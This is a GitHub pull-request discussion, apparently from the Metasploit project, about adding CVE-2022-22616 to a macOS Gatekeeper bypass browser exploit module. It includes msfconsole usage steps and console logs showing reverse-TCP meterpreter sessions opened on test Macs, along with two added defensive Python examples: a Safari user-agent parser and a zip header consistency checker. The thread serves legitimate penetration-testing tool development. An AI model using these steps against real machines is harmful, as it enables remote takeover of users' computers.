Add CVE-2022-22616 to gatekeeper bypass module #16401

Merged
merged 4 commits into from
Apr 6, 2022

Conversation

space-r7
Contributor

@space-r7 space-r7 commented Apr 1, 2022

Description

This adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Big Sur all the way to macOS Monterey versions below 12.3. Since this now targets two CVEs, I've introduced a new CVE option to select which CVE to exploit. The default is the most recent CVE.

Notes: Currently, the native OSX payload / target dies during exploitation. Not sure if that is related to the exploit itself or if there's an issue with the payload, so I'll try and look into that next week.

Verification

  • Start msfconsole
  • use exploit/osx/browser/osx_gatekeeper_bypass
  • set CVE <cve_num>
  • set LHOST <tab>
  • set SRVHOST <tab>
  • exploit
  • Visit the URL on a vulnerable version of macOS

Scenarios

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   macOS x64 (Native Payload)
   1   Python payload
   2   Command payload


msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.140.1:4444 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > [*] Using URL: http://192.168.140.1:8080/0sJEWz
[*] Server started.
[*] 192.168.140.133  osx_gatekeeper_bypass - Request /0sJEWz from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
[+] 192.168.140.133  osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
[*] Sending stage (39936 bytes) to 192.168.140.133
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.133:49153 ) at 2022-04-01 17:47:58 -0500

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: space
meterpreter > sysinfo
Computer     : spaces-Mac.local
OS           : Darwin 21.2.0 Darwin Kernel Version 21.2.0: Sun Nov 28 20:28:54 PST 2021; root:xnu-8019.61.5~1/RELEASE_X86_64
Architecture : x64
Meterpreter  : python/osx
meterpreter >

@space-r7 space-r7 added module rn-modules release notes for new or majorly enhanced modules labels Apr 1, 2022
@timwr
Contributor

timwr commented Apr 3, 2022

LGTM! I think this is OK to land as-is?
I tested on macOS 10.15.7 Catalina with Safari:

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set URIPATH /gatekeeper
URIPATH => /gatekeeper
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/gatekeeper
[*] Server started.

msf6 exploit(osx/browser/osx_gatekeeper_bypass) >
[*] 192.168.56.9     osx_gatekeeper_bypass - Request /gatekeeper from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
[+] 192.168.56.9     osx_gatekeeper_bypass - macOS version 10.15.7 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810576 bytes) to 192.168.56.9
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.9:49165 ) at 2022-04-03 07:28:59 +0100

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : Users-MacBook-Pro.local
OS           : macOS Catalina (macOS 10.15.7)
Architecture : x86
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx

I couldn't reproduce the issue where the native session dies?

@h00die
Contributor

h00die commented Apr 3, 2022

I'm on 11.2.3 with the following output:

msf6 > use exploit/osx/browser/osx_gatekeeper_bypass
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set target 1
target => 1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/iFXRfTb532eIeR
[*] Server started.
[*] 2.2.2.2     osx_gatekeeper_bypass - Request /iFXRfTb532eIeR from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 2.2.2.2     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable

At this point a file appeared in Downloads with a grey circle with a slash through it, and no further actions happened.

Also interesting: it's on 11.2.3 per "About this Mac", but it's being detected as 10.15.6 (this is what the UA says it is...)

@space-r7
Contributor Author

space-r7 commented Apr 4, 2022

I'll try and see if I can test on a 11.2.* version and figure out what's going wrong. I'm also seeing 10.15.6 in the user agent on macOS 12.1.
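
The two comments above make a point worth keeping in mind when reading this module's "macOS version X is vulnerable" line: the version comes from the Safari User-Agent, and Safari stops updating that field. In this thread an 11.2.3 host and a 12.1 host both present `10_15_6`, and the first scenario's host reports `Darwin 21.2.0` in `sysinfo` while its UA says `10_15_7`. The parser below is an added example written for this page, not code from the module or from Rapid7, that pulls the reported macOS and Safari versions out of a UA string and marks the OS value as pinned (real version unknown, at least the reported one) when it is one of those frozen values. It also answers the only question the UA can still answer reliably, whether the Safari build is below a given version, using the 15.4 patch level the thread mentions as the threshold. The names `parse_safari_ua`, `safari_older_than`, `SafariUA`, `PINNED_MACOS_VALUES` and the two constructed sample UAs are mine.

```python
import re
from typing import NamedTuple, Optional, Tuple

# The first two strings are the Safari UAs logged in the console output above;
# the other two are constructed for this example.
SAMPLE_UAS = {
    "monterey_host_safari_15_2":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
        "(KHTML, like Gecko) Version/15.2 Safari/605.1.15",
    "big_sur_host_safari_14_0_3":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 "
        "(KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "constructed_mojave_safari_13":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 "
        "(KHTML, like Gecko) Version/13.1.2 Safari/605.1.15",
    "constructed_chrome":
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36",
}

# OS values Safari freezes at. 10_15_6 is observed on 11.2.3 and 12.1 hosts in this
# thread; 10_15_7 is what the Darwin 21.2.0 (12.1) host in the first scenario sends.
PINNED_MACOS_VALUES = {(10, 15, 6), (10, 15, 7)}

MACOS_RE = re.compile(r"Mac OS X (\d+(?:[._]\d+)*)")
SAFARI_VERSION_RE = re.compile(r"\bVersion/(\d+(?:\.\d+)*)")


class SafariUA(NamedTuple):
    macos_reported: Tuple[int, ...]  # what the UA claims
    safari: Tuple[int, ...]          # from the "Version/x.y.z" token
    macos_pinned: bool               # True: real OS is >= reported, exact value unknown


def _vtuple(text: str) -> Tuple[int, ...]:
    """'10_15_6' or '14.0.3' -> (10, 15, 6) / (14, 0, 3), comparable as tuples."""
    return tuple(int(part) for part in re.split(r"[._]", text))


def parse_safari_ua(ua: str) -> Optional[SafariUA]:
    """Parse a genuine Safari UA; return None for Chrome/Chromium-family or non-Safari UAs."""
    if "Safari/" not in ua or any(t in ua for t in ("Chrome/", "Chromium/", "CriOS/")):
        return None
    os_match = MACOS_RE.search(ua)
    ver_match = SAFARI_VERSION_RE.search(ua)
    if not (os_match and ver_match):
        return None
    macos = _vtuple(os_match.group(1))
    return SafariUA(macos, _vtuple(ver_match.group(1)), macos in PINNED_MACOS_VALUES)


def safari_older_than(ua: str, threshold: Tuple[int, ...] = (15, 4)) -> Optional[bool]:
    """True if the UA is Safari below `threshold` (default: the 15.4 fix level named in
    the thread), False if at or above, None if the UA is not Safari at all."""
    parsed = parse_safari_ua(ua)
    if parsed is None:
        return None
    return parsed.safari < threshold


if __name__ == "__main__":
    for label, ua in SAMPLE_UAS.items():
        parsed = parse_safari_ua(ua)
        print(f"{label:30} {parsed}  below 15.4: {safari_older_than(ua)}")
```

The practical takeaway for anyone triaging from web or proxy logs: treat the OS field of a Safari UA as a lower bound, not a version, and drive patch-compliance questions off the `Version/` token instead.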

@timwr
Contributor

timwr commented Apr 5, 2022

I can't reproduce any failures for this unfortunately. I have two devices on 10.15.7 but presumably if I allow them to update, they will receive the patch for this issue.
@h00die do you have any app* files in the ~/Downloads/ folder that might be getting in the way?

@space-r7
Contributor Author

space-r7 commented Apr 5, 2022

I tested on 11.5.2, and the file does still have the com.apple.quarantine attribute once downloaded / extracted with Safari. It's odd since the Jamf blog mentions that the exploit was tested on Safari versions going back to 14.0.2, my version being 14.1.2. Patched in version 15.4. I'm not getting the issue that @h00die described though.

@h00die
Contributor

h00die commented Apr 5, 2022

#RTFM I didn't realize clicking the file was required. This is working for me with the same payload as @timwr.

msf6 exploit(osx/browser/osx_gatekeeper_bypass) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/a
[*] Server started.
[*] 2.2.2.2     osx_gatekeeper_bypass - Request /a from Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
[+] 2.2.2.2     osx_gatekeeper_bypass - macOS version 10.15.6 is vulnerable
[*] Transmitting first stager...(210 bytes)
[*] Transmitting second stager...(8192 bytes)
[*] Sending stage (810576 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:51264 ) at 2022-04-05 09:21:50 -040
meterpreter > sysinfo
Computer     : h00dies-MBP.home
OS           :  (macOS 11.2.3)
Architecture : x64
BuildTuple   : x86_64-apple-darwin
Meterpreter  : x64/osx

@space-r7
Contributor Author

space-r7 commented Apr 5, 2022

Just added a new commit that sets the local file header in the zip like in the Jamf blog post. It will also check the reported Safari version in the user agent if CVE-2022-22616 is being used. This time, I tested on both 11.5.2 and 12.1, and they both worked.
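
The commit described above touches the zip's local file header. A zip archive carries each entry's metadata twice: a local file header immediately in front of the entry data, and a central directory record at the end of the file, and nothing forces the two copies to agree. That is why an archive inspector should compare them rather than trust whichever copy its parser happens to read. The checker below is an added example written for this page, not the module's code and not a reproduction of the Jamf technique: it walks the central directory with Python's `zipfile`, parses each local file header by hand, and reports every field on which the two disagree. It is a generic integrity check for triaging downloaded archives, not a detector tied to this CVE. The names `check_zip_consistency`, `build_sample_zip` and `build_tampered_zip` are mine, and the sample archive is constructed in memory.

```python
import io
import struct
import zipfile
from typing import Dict, List

LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")  # fixed 30-byte part of a local file header
LOCAL_SIG = b"PK\x03\x04"
FLAG_DATA_DESCRIPTOR = 0x0008  # CRC/sizes live in a trailing data descriptor instead
FLAG_UTF8 = 0x0800             # filename is UTF-8 rather than CP437


def check_zip_consistency(data: bytes) -> List[Dict[str, str]]:
    """Compare each central-directory entry with the local file header it points at.
    Returns one finding per disagreeing field; an empty list means the copies agree.
    (ZIP64 size placeholders are not special-cased in this example.)"""
    findings: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:      # reads the central directory only
        for info in zf.infolist():
            off = info.header_offset
            fixed = data[off:off + LOCAL_HEADER.size]
            if len(fixed) < LOCAL_HEADER.size:
                findings.append({"name": info.filename, "field": "local_header",
                                 "local": "truncated", "central": str(off)})
                continue
            (sig, _ver, flags, method, _mtime, _mdate, crc, csize, usize,
             name_len, _extra_len) = LOCAL_HEADER.unpack(fixed)
            if sig != LOCAL_SIG:
                findings.append({"name": info.filename, "field": "signature",
                                 "local": sig.hex(), "central": LOCAL_SIG.hex()})
                continue
            raw_name = data[off + LOCAL_HEADER.size:off + LOCAL_HEADER.size + name_len]
            local_name = raw_name.decode("utf-8" if flags & FLAG_UTF8 else "cp437",
                                         errors="replace")
            checks = [("filename", local_name, info.orig_filename),
                      ("compression_method", method, info.compress_type)]
            if not flags & FLAG_DATA_DESCRIPTOR:  # otherwise these are legitimately zero
                checks += [("crc32", crc, info.CRC),
                           ("compressed_size", csize, info.compress_size),
                           ("uncompressed_size", usize, info.file_size)]
            for field, local, central in checks:
                if local != central:
                    findings.append({"name": info.filename, "field": field,
                                     "local": str(local), "central": str(central)})
    return findings


def build_sample_zip() -> bytes:
    """Constructed, well-formed one-entry archive (not an artifact from the thread)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("readme.txt", "constructed sample content\n")
    return buf.getvalue()


def build_tampered_zip() -> bytes:
    """Same archive with the local-header filename rewritten in place (same length)
    while the central directory still says readme.txt."""
    data = bytearray(build_sample_zip())
    with zipfile.ZipFile(io.BytesIO(bytes(data))) as zf:
        info = zf.getinfo("readme.txt")
    name_off = info.header_offset + LOCAL_HEADER.size
    data[name_off:name_off + len("readme.txt")] = b"README.TXT"
    return bytes(data)


if __name__ == "__main__":
    for label, blob in (("clean", build_sample_zip()), ("tampered", build_tampered_zip())):
        print(label, check_zip_consistency(blob))
```

The checker parses the local header itself instead of calling `ZipFile.open()` because `zipfile` raises `BadZipFile` as soon as it sees the two filenames differ; a triage tool wants the full list of disagreements, not the first exception.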

@timwr
Contributor

timwr commented Apr 6, 2022

a43bfc9 is still working well for me. I'll go ahead and land this.
Nice work @space-r7!
Thanks for testing @h00die

@timwr timwr merged commit d60754e into rapid7:master Apr 6, 2022
@timwr
Contributor

timwr commented Apr 6, 2022

Release notes

This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to macOS Monterey versions below 12.3. Since this now targets two CVEs, I've introduced a new CVE option to select which CVE to exploit. The default is the most recent CVE.

@timwr timwr self-assigned this Apr 6, 2022
@space-r7
Contributor Author

space-r7 commented Apr 6, 2022

Thanks for testing, @h00die! And thanks for testing / landing, @timwr!

@space-r7 space-r7 deleted the monterey_bypass branch April 6, 2022 14:40